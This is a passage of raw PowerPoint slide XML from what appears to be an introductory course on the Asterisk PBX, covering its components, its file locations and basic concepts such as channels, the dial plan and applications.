              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>obsolete</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and replaced by DAHDI)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2700">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-400050" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1155CC"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Libpri</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2700">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-400050" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1155CC"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pjSIP</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2700">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2700">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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8" name="Shape 3768"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3769" name="Google Shape;3769;p605"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1452900" y="170275"/>
            <a:ext cx="56226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Asterisk File Locations</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3770" name="Google Shape;3770;p605"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7519300" y="170275"/>
            <a:ext cx="1531851" cy="436650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3771" name="Google Shape;3771;p605"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442950" y="917575"/>
            <a:ext cx="8258100" cy="3688800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-339725" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1155CC"/>
              </a:buClr>
              <a:buSzPts val="1750"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/etc/asterisk/ - Asterisk configuration files</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1750">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-339725" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1155CC"/>
              </a:buClr>
              <a:buSzPts val="1750"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/usr/lib/asterisk/modules/ - all loadable modules: codecs, channels, formats etc. </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1750">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-339725" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1155CC"/>
              </a:buClr>
              <a:buSzPts val="1750"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/var/lib/asterisk/ - contains the astdb, sounds, images, firmware and keys</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1750">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-339725" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1155CC"/>
              </a:buClr>
              <a:buSzPts val="1750"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/var/spool/asterisk/ - temporary files and voicemail files</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1750">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-339725" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1155CC"/>
              </a:buClr>
              <a:buSzPts val="1750"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/var/run/ - contains the process ID (PID) for running processes, including Asterisk</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1750">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-339725" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1155CC"/>
              </a:buClr>
              <a:buSzPts val="1750"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/var/log/asterisk/ - Asterisk log files </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1750">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-339725" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1155CC"/>
              </a:buClr>
              <a:buSzPts val="1750"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/var/log/asterisk/cdr-csv/ - Asterisk call detail records</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1750">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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5" name="Shape 3775"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3776" name="Google Shape;3776;p606"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7089" l="1457" r="5110" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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0" name="Shape 3780"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3781" name="Google Shape;3781;p607"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1452900" y="170275"/>
            <a:ext cx="56226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Asterisk Basics</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3782" name="Google Shape;3782;p607"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7519300" y="170275"/>
            <a:ext cx="1531851" cy="436650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3783" name="Google Shape;3783;p607"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442950" y="690175"/>
            <a:ext cx="8352600" cy="39162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1155CC"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Asterisk is a hybrid TDM and packet voice PBX.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1900">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1155CC"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Interfaces any piece of telephony hardware or software to any telephony application.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1900">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1155CC"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prime components: channels and /etc/asterisk/extensions.conf - the Asterisk dial plan.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1900">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1155CC"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Channels can be many different technologies - SIP, IAX, H323, skinny, Zaptel, and others as they are created.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1900">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1155CC"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>extensions.conf is basically a powerful programming language controlling the flow of calls.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1900">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1155CC"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Applications do the work - answering a channel, ringing a channel, providing a voicemail system etc.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1900">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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7" name="Shape 3787"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3788" name="Google Shape;3788;p608"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4021" l="0" r="2742" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3789" name="Google Shape;3789;p608"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="37870" l="67314" r="7430" t="26247"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5655176" y="2713100"/>
            <a:ext cx="2172523" cy="1736176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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3" name="Shape 3793"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3794" name="Google Shape;3794;p609"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4870" l="0" r="3222" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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8" name="Shape 3798"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3799" name="Google Shape;3799;p610"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4870" l="0" r="3437" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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3" name="Shape 3803"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3804" name="Google Shape;3804;p611"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4406" l="0" r="2742" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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8" name="Shape 3808"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3809" name="Google Shape;3809;p612"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2865" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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3" name="Shape 3813"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3814" name="Google Shape;3814;p613"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="3063" l="0" r="1555" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3815" name="Google Shape;3815;p613"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="34222" l="62242" r="7537" t="36036"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5497351" y="1543250"/>
            <a:ext cx="2599598" cy="1439076"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3816" name="Google Shape;3816;p613"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="28278" l="71308" r="8076" t="41021"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7001402" y="104200"/>
            <a:ext cx="1773302" cy="1485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83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="45675"/>
            <a:ext cx="9064528" cy="5097825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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0" name="Shape 3820"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
